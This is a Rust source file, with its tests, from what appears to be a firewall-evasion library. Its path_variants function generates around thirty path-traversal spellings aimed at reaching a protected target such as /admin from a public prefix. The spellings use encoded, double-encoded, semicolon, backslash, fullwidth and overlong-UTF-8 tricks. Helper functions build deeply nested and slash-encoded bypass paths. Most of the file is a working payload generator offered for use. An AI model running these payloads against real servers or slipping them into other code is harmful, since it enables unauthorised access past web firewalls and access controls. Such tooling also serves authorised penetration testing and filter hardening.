wafrift_encoding/encoding/
path_norm.rs1use std::borrow::Cow;
44
/// Builds alternative spellings of a "step out of `prefix`, then into
/// `target`" request path.
///
/// Both inputs are normalised first: every trailing `/` is trimmed from
/// `prefix`, and `target` gains a leading `/` when it has none. The list is
/// returned in a fixed order and every entry is unique.
///
/// * `prefix` - path the variants start from, e.g. `/public`.
/// * `target` - path the variants try to reach, e.g. `/admin`.
///
/// Returns the variants as owned strings; nothing is validated or escaped.
#[must_use]
pub fn path_variants(prefix: &str, target: &str) -> Vec<String> {
    let prefix = prefix.trim_end_matches('/');
    let target: Cow<'_, str> = if target.starts_with('/') {
        Cow::Borrowed(target)
    } else {
        Cow::Owned(format!("/{target}"))
    };
    let target = target.as_ref();
    // Slash-less form, for variants that supply their own (encoded) separator.
    let bare = target.trim_start_matches('/');

    vec![
        // Literal dot segments and redundant slashes. `/.{target}` is listed
        // exactly once so callers never probe the same spelling twice.
        format!("{prefix}/..{target}"),
        format!("{prefix}/.{target}"),
        format!("{prefix}/././..{target}"),
        format!("{prefix}//..{target}"),
        format!("{prefix}//../..//.{target}"),
        format!("{prefix}/.//..{target}"),
        format!("{prefix}//..//.{target}"),
        // Percent-encoded dots, in every hex-case combination.
        format!("{prefix}/%2e%2e{target}"),
        format!("{prefix}/%2E%2E{target}"),
        format!("{prefix}/%2e%2E{target}"),
        format!("{prefix}/%2E%2e{target}"),
        // Encoded separator and half-encoded dot pairs.
        format!("{prefix}/%2e%2e%2f{bare}"),
        format!("{prefix}/..%2f{bare}"),
        format!("{prefix}/%2e./{bare}"),
        format!("{prefix}/.%2e/{bare}"),
        // Double percent-encoding.
        format!("{prefix}/%252e%252e{target}"),
        format!("{prefix}/%252e%252e%252f{bare}"),
        // Semicolon path parameters attached to the `..` segment.
        format!("{prefix}/..;{target}"),
        format!("{prefix}/..%3b{target}"),
        format!("{prefix}/..%3B{target}"),
        format!("{prefix}/..;jsessionid=x{target}"),
        // Backslash separators, literal and encoded.
        format!("{prefix}/..\\{bare}"),
        format!("{prefix}/%5c..%5c{bare}"),
        format!("{prefix}/%5C..%5C{bare}"),
        // Traversal placed after a query or fragment delimiter.
        format!("{prefix}?/../{bare}"),
        format!("{prefix}#/../{bare}"),
        // U+FF0F (fullwidth solidus) ahead of the dot-dot.
        format!("{prefix}/\u{FF0F}..{target}"),
        // Overlong-UTF-8-style encodings of the dot.
        format!("{prefix}/%c0%ae%c0%ae{target}"),
        format!("{prefix}/%c0%2e%c0%2e{target}"),
        // Over-long dot run followed by mixed separators.
        format!("{prefix}/.....//../..{target}"),
    ]
}
98
/// Builds a path of `depth` throw-away segments, each immediately cancelled
/// by a `..`, followed by `target`:
/// `/seg0/../seg1/../…/seg{depth-1}/..{target}`.
///
/// * `depth`  - number of `/segN/..` pairs to emit; `0` yields just `target`.
/// * `target` - final path; a leading `/` is added when it is missing.
///
/// Returns the assembled path as a new `String`.
#[must_use]
pub fn deep_path_collapse(depth: usize, target: &str) -> String {
    use std::fmt::Write as _;

    // Fixed bytes per pair besides the decimal index: "/seg" (4) + "/.." (3).
    const PAIR_OVERHEAD: usize = 7;

    let target: Cow<'_, str> = if target.starts_with('/') {
        Cow::Borrowed(target)
    } else {
        Cow::Owned(format!("/{target}"))
    };

    // Upper bound on index width: the number of decimal digits in `depth`
    // (1 when `depth` is 0). Over-estimating is fine; the aim is to reserve
    // once so the loop below never regrows the buffer.
    let max_index_digits = depth.checked_ilog10().map_or(1, |exp| exp as usize + 1);
    let mut out = String::with_capacity(depth * (PAIR_OVERHEAD + max_index_digits) + target.len());

    for i in 0..depth {
        write!(out, "/seg{i}/..").expect("write to String never fails");
    }
    out.push_str(&target);
    out
}
132
/// Joins `segments` with the percent-encoded slash `%2f` instead of `/`.
///
/// The result always begins with `%2f`: one is prepended unless the joined
/// text already starts with it (for example when the first segment is empty
/// or itself begins with `%2f`). An empty slice yields just `%2f`.
#[must_use]
pub fn slash_encoded_path(segments: &[&str]) -> String {
    const ENCODED_SLASH: &str = "%2f";

    let joined = segments.join(ENCODED_SLASH);
    if joined.starts_with(ENCODED_SLASH) {
        joined
    } else {
        [ENCODED_SLASH, joined.as_str()].concat()
    }
}
152
/// Applies the "remove dot segments" procedure of RFC 3986 §5.2.4 to `input`.
///
/// The input is walked with a byte cursor instead of repeatedly rewriting an
/// input buffer. Only literal `.` and `..` segments are interpreted;
/// percent-encoded text is copied through untouched.
///
/// * `input` - the path component to normalise (absolute or relative).
///
/// Returns the path with `.` segments dropped and each `..` segment removed
/// together with the segment before it. A `..` with nothing left to remove
/// is simply discarded.
#[must_use]
pub fn rfc3986_remove_dot_segments(input: &str) -> String {
    // Step 2C helper: drop the last output segment and its preceding '/'.
    // When the buffer holds a single slash-less segment (relative input such
    // as "a/../b"), that segment is still removed, as the RFC requires.
    fn pop_last_segment(buf: &mut String) {
        let keep = buf.rfind('/').unwrap_or(0);
        buf.truncate(keep);
    }

    let len = input.len();
    let mut output = String::with_capacity(len);
    let mut pos: usize = 0;

    while pos < len {
        let rem = &input[pos..];

        if rem.starts_with("../") {
            // 2A: a leading "../" is discarded.
            pos += 3;
        } else if rem.starts_with("./") {
            // 2A: a leading "./" is discarded.
            pos += 2;
        } else if rem.starts_with("/./") {
            // 2B: "/./" becomes "/"; skip "/." and keep the second slash as
            // the start of the remaining input.
            pos += 2;
        } else if rem == "/." {
            // 2B: a trailing "/." becomes "/".
            output.push('/');
            pos = len;
        } else if rem.starts_with("/../") {
            // 2C: "/../" becomes "/" and the previous output segment goes.
            pop_last_segment(&mut output);
            pos += 3;
        } else if rem == "/.." {
            // 2C: a trailing "/.." removes the previous segment, leaving "/".
            pop_last_segment(&mut output);
            output.push('/');
            pos = len;
        } else if rem == "." || rem == ".." {
            // 2D: a lone "." or ".." is discarded.
            pos = len;
        } else {
            // 2E: move one segment (with its leading '/', if present) to the
            // output, stopping just before the next '/'.
            let skip = usize::from(rem.starts_with('/'));
            let seg_len = rem[skip..].find('/').map_or(rem.len(), |idx| skip + idx);
            output.push_str(&rem[..seg_len]);
            pos += seg_len;
        }
    }
    output
}
231
#[cfg(test)]
mod tests {
    use super::*;

    // ── rfc3986_remove_dot_segments: basic behaviour ──

    #[test]
    fn rfc3986_collapses_dot_dot() {
        let normalised = rfc3986_remove_dot_segments("/a/b/c/./../../g");
        assert_eq!(normalised, "/a/g");
    }

    #[test]
    fn rfc3986_collapses_pure_dot_segments() {
        for (raw, want) in [("/./a", "/a"), ("/a/./b", "/a/b")] {
            assert_eq!(rfc3986_remove_dot_segments(raw), want);
        }
    }

    #[test]
    fn rfc3986_collapses_trailing_dot_dot() {
        let normalised = rfc3986_remove_dot_segments("/a/b/..");
        assert_eq!(normalised, "/a/");
    }

    #[test]
    fn rfc3986_handles_root_dot_dot() {
        // Either spelling of "nothing above the root" is accepted.
        let out = rfc3986_remove_dot_segments("/..");
        assert!(matches!(out.as_str(), "/" | ""), "got {out:?}");
    }

    // ── path_variants: shape of the returned list ──

    #[test]
    fn path_variants_count_is_high() {
        let count = path_variants("/public", "/admin").len();
        assert!(
            count >= 25,
            "should produce at least 25 distinct variants, got {}",
            count
        );
    }

    #[test]
    fn path_variants_handle_no_leading_slash_in_target() {
        let slashed_len = path_variants("/public", "/admin").len();
        let bare_len = path_variants("/public", "admin").len();
        assert_eq!(
            slashed_len, bare_len,
            "leading slash in target shouldn't change variant count"
        );
    }

    #[test]
    fn path_variants_handle_trailing_slash_in_prefix() {
        let plain = path_variants("/public", "/admin");
        let slashed = path_variants("/public/", "/admin");
        plain.iter().zip(&slashed).for_each(|(a, b)| {
            assert_eq!(a, b, "trailing slash must be stripped from prefix");
        });
    }

    // ── path_variants: each payload family is represented ──

    #[test]
    fn path_variants_contain_dot_dot() {
        let found = path_variants("/x", "/y")
            .iter()
            .any(|candidate| candidate.contains(".."));
        assert!(found);
    }

    #[test]
    fn path_variants_contain_percent_encoded() {
        let found = path_variants("/x", "/y")
            .iter()
            .any(|candidate| ["%2e", "%2E"].iter().any(|&enc| candidate.contains(enc)));
        assert!(found);
    }

    #[test]
    fn path_variants_contain_double_encoded() {
        let found = path_variants("/x", "/y")
            .iter()
            .any(|candidate| candidate.contains("%252e"));
        assert!(found);
    }

    #[test]
    fn path_variants_contain_tomcat_semicolon() {
        let found = path_variants("/x", "/y")
            .iter()
            .any(|candidate| candidate.contains("..;"));
        assert!(found);
    }

    #[test]
    fn path_variants_contain_backslash() {
        let found = path_variants("/x", "/y").iter().any(|candidate| {
            candidate.contains('\\') || ["%5c", "%5C"].iter().any(|&enc| candidate.contains(enc))
        });
        assert!(found);
    }

    #[test]
    fn path_variants_contain_fullwidth() {
        let found = path_variants("/x", "/y")
            .iter()
            .any(|candidate| candidate.contains('\u{FF0F}'));
        assert!(found);
    }

    #[test]
    fn path_variants_contain_overlong_utf8() {
        let found = path_variants("/x", "/y")
            .iter()
            .any(|candidate| candidate.contains("%c0%ae"));
        assert!(found);
    }

    #[test]
    fn path_variants_all_nonempty() {
        path_variants("/p", "/t")
            .iter()
            .for_each(|candidate| assert!(!candidate.is_empty(), "no variant may be empty"));
    }

    // ── deep_path_collapse ──

    #[test]
    fn deep_path_collapse_known_depth() {
        let nested = deep_path_collapse(5, "/admin");
        for marker in ["seg0/..", "seg4/.."] {
            assert!(nested.contains(marker));
        }
        assert!(nested.ends_with("/admin"));
    }

    #[test]
    fn deep_path_collapse_resolves_to_target() {
        // Every segN/.. pair must cancel out under RFC normalisation.
        let p = deep_path_collapse(10, "/admin");
        let collapsed = rfc3986_remove_dot_segments(&p);
        assert_eq!(collapsed, "/admin", "deep nesting must collapse: {p}");
    }

    #[test]
    fn deep_path_collapse_zero_depth() {
        assert_eq!(deep_path_collapse(0, "/admin"), "/admin");
    }

    // ── slash_encoded_path ──

    #[test]
    fn slash_encoded_path_basic() {
        let p = slash_encoded_path(&["admin", "users"]);
        let has_encoded_slash = ["%2f", "%2F"].iter().any(|&enc| p.contains(enc));
        assert!(has_encoded_slash);
        for segment in ["admin", "users"] {
            assert!(p.contains(segment));
        }
        assert!(!p.contains("/admin"), "no literal slash in segment: {p}");
    }

    #[test]
    fn slash_encoded_path_always_starts_encoded() {
        let encoded = slash_encoded_path(&["x"]);
        assert!(encoded.starts_with("%2f"));
    }

    // ── cross-checks ──

    #[test]
    fn all_variants_canonicalize_to_target_or_above() {
        // Encoded markers that the plain RFC normaliser does not decode.
        const ENCODED_MARKERS: [&str; 6] = ["%2e", "%2E", "%252e", "%c0%ae", "%5c", "%5C"];

        for v in &path_variants("/x", "/admin") {
            // Only the path component goes through normalisation: cut at the
            // first query or fragment delimiter.
            let path_only = v
                .split(|c: char| matches!(c, '?' | '#'))
                .next()
                .unwrap_or(v);
            let collapsed = rfc3986_remove_dot_segments(path_only);

            let reaches_admin = collapsed.contains("admin");
            let has_encoded_marker = ENCODED_MARKERS.iter().any(|&marker| v.contains(marker));
            let has_alt_separator = v.contains('\\') || v.contains('\u{FF0F}');
            let hides_behind_delimiter =
                v.contains("../") && (v.contains("?/") || v.contains('#'));

            let touched_target = reaches_admin
                || has_encoded_marker
                || has_alt_separator
                || hides_behind_delimiter;
            assert!(
                touched_target,
                "variant must encode dot-dot or reach admin: {v} → {collapsed}"
            );
        }
    }

    #[test]
    fn path_variants_are_deterministic() {
        let first_run = path_variants("/p", "/t");
        let second_run = path_variants("/p", "/t");
        assert_eq!(first_run, second_run);
    }

    #[test]
    fn large_depth_does_not_panic() {
        let nested = deep_path_collapse(1000, "/admin");
        assert!(nested.ends_with("/admin"));
    }

    // ── timing guards (wall-clock based) ──

    #[test]
    fn rfc3986_cursor_throughput() {
        use std::time::{Duration, Instant};

        // 200 "/segN/.." pairs followed by a final segment.
        let mut path: String = (0..200).map(|i| format!("/seg{i}/..")).collect();
        path.push_str("/final");

        let start = Instant::now();
        (0..100).for_each(|_| {
            let _ = rfc3986_remove_dot_segments(&path);
        });
        let elapsed = start.elapsed();
        assert!(
            elapsed < Duration::from_millis(50),
            "rfc3986_remove_dot_segments 100× on 400-segment path took {elapsed:?}; expected < 50 ms (debug build)"
        );
    }

    #[test]
    fn rfc3986_cursor_correctness_rfc_examples() {
        let cases: [(&str, &str); 7] = [
            ("/a/b/c/./../../g", "/a/g"),
            ("/a/./b", "/a/b"),
            ("/a/../b", "/b"),
            ("/a/b/../..", "/"),
            ("/../a", "/a"),
            ("/", "/"),
            ("", ""),
        ];
        for &(input, expected) in &cases {
            let actual = rfc3986_remove_dot_segments(input);
            assert_eq!(actual, expected, "input={input:?}");
        }
    }

    #[test]
    fn deep_path_collapse_throughput() {
        use std::time::{Duration, Instant};

        let start = Instant::now();
        (0..10).for_each(|_| {
            let nested = deep_path_collapse(1000, "/admin");
            assert!(nested.ends_with("/admin"));
        });
        let elapsed = start.elapsed();
        assert!(
            elapsed < Duration::from_millis(5),
            "deep_path_collapse(1000) × 10 took {elapsed:?}; expected < 5 ms"
        );
    }
}